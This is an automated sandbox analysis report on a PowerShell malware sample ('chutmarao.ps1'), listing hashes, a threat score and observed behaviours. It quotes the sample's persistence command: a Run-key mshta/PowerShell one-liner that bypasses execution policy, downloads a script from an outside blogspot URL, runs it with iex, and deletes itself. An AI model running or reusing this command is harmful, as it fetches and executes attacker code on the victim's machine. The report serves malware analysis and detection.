Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
submitted
28-11-2024 07:35
Static task
static1
Behavioral task
behavioral1
Sample
chutmarao.ps1
Resource
win7-20240903-en
windows7-x64
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
chutmarao.ps1
Resource
win10v2004-20241007-en
windows10-2004-x64
14 signatures
150 seconds
General
-
Target
chutmarao.ps1
-
Size
2.5MB
-
MD5
7c2e9489af70d3967960dbe1cb87f4ae
-
SHA1
bcade1f31f869e58848c09cd022652b612580daf
-
SHA256
19bad3275a0cd1caa9a8eb75d496eaa897ca4c7a07aeab78ab3309d91b4f64fd
-
SHA512
9d910243fa5847046dd6793465d5b84c2e1f72d7d42acd5e52860f9bd3545b25e981322a312930a192dd43bafe3c5679657699a78bc98f48b4b6a2aec447a374
-
SSDEEP
1536:7Ic2Lo8L+bTXe26vgn00oR/S7rV521Gd9AcaMorjFN4UAjtbTliBdIpjXClBEv7l:ZD1
Score
7/10
Malware Config
Signatures
-
Deletes itself 1 IoCs
pid Process 1752 powershell.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\Defenderlt-150 = "mshta \"javascript:pm=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hoot11nov.blogspot.com////loka.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObject']; new ActiveXObject(pm[2])[pm[0]](pm[1], 0, true);close();md=new ActiveXObject('Scripting.FileSystemObject');md.DeleteFile(WScript.ScriptFullName);\"" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\Defenderl-120 = "schtasks /run /tn Defenderl-120" powershell.exe -
pid Process 1752 powershell.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 1752 powershell.exe 1752 powershell.exe 1752 powershell.exe 1752 powershell.exe 1752 powershell.exe 1752 powershell.exe 1752 powershell.exe 1752 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1752 powershell.exe
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\chutmarao.ps11⤵
- Deletes itself
- Adds Run key to start application
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1752